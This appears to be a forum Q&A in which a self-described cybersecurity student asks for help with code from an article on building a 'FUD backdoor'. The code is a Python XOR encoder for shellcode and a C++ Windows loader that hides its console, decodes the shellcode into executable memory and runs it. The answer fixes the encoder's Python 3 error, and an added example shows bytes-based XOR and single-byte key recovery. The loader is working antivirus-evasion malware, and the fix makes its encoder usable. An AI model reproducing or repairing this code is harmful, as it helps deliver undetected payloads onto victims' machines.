I am working on a project for my college cybersecurity class on penetration testing. I have found a site (https://macrosec.tech/index.php/2020/09/20/creating-a-fud-backdoor/) that has Python code for an XOR encryptor as well as C++ code for a loader. The Python code is meant to be run in the command line, taking an input file and specifying an output file. For example, you would run the code by running `python xor_file.py sample.txt > output_file.txt`. However, when I run the code it doesn't work. I am very inexperienced with encryption and Python, so any help would be greatly appreciated. The code is below.
```python
import sys

KEY = 'x'

def xor(data, key):
    key = str(key)
    l = len(key)
    output_str = ''
    for i in range(len(data)):
        current = data[i]
        current_key = key[i % len(key)]
        output_str += chr(ord(current) ^ ord(current_key))
    return output_str

def printCiphertext(ciphertext):
    print("{ 0x" + ", 0x".join(hex(ord(x))[2:] for x in ciphertext) + "};")

try:
    plaintext = open(sys.argv[1], 'rb').read()
except:
    print('File argument needed! %s ' % sys.argv[0])
    sys.exit()

ciphertext = xor(plaintext, KEY)
print("{ 0x" + ", 0x".join(hex(ord(x))[2:] for x in ciphertext) + "};")
```

The loader code is as follows:

```cpp
#include <windows.h>
#include <iostream>

int main(int argc, char **argv) {
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char b[] = {/* your XORd, with key of 'x', shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
    char c[sizeof b];
    for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
    void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, c, sizeof c);
    ((void(*)())exec)();
}
```

I have messed around with it a bit but every time I fix an error a new one replaces it.

When I run the Python code you included using Python 3.11, I get the following error:

```
Traceback (most recent call last):
  File "/Users/myusername/xor_file.py", line 29, in <module>
    ciphertext = xor(plaintext, KEY)
                 ^^^^^^^^^^^^^^^^^^^
  File "/Users/myusername/xor_file.py", line 17, in xor
    output_str += chr(ord(current) ^ ord(current_key))
                      ^^^^^^^^^^^^
TypeError: ord() expected string of length 1, but int found
```

You open the file and read it in as binary data. In this case, the call to `ord(current)` is redundant, because `current` is already an integer value after `current = data[i]`. See this link for more information. If you remove `ord()` around `current`, the code runs.
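
The `bytes` behaviour described in the answer, shown as an added example that is not part of the original question, answer or linked article. It goes one step beyond the `TypeError` to show that a one-byte XOR key such as `'x'` can be recovered by trying all 256 values against a known marker, which is how an analyst or scanner undoes this kind of encoding. The names `xor_bytes` and `recover_single_byte_key` and the sample data are assumptions constructed for illustration.

```python
# Added example: Python 3 bytes semantics plus single-byte XOR key recovery.
# Function names, sample data and markers are constructed for illustration.

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR over bytes.

    Iterating or indexing a bytes object yields ints in Python 3, so the
    values can be XORed directly without ord() or chr().
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_single_byte_key(blob: bytes, marker: bytes):
    """Try all 256 one-byte keys.

    Returns (key, decoded) for the first key whose output contains the
    known marker, or None when no key produces it.
    """
    for k in range(256):
        candidate = xor_bytes(blob, bytes([k]))
        if marker in candidate:
            return k, candidate
    return None


# Constructed sample: harmless text standing in for the input file contents.
SAMPLE = b"hello from sample.txt\n"
ENCODED = xor_bytes(SAMPLE, b"x")

if __name__ == "__main__":
    print(type(SAMPLE[0]))   # indexing bytes gives an int, not a 1-char str
    print(ENCODED.hex())     # encoded form of the constructed sample
    print(recover_single_byte_key(ENCODED, b"sample.txt"))
```
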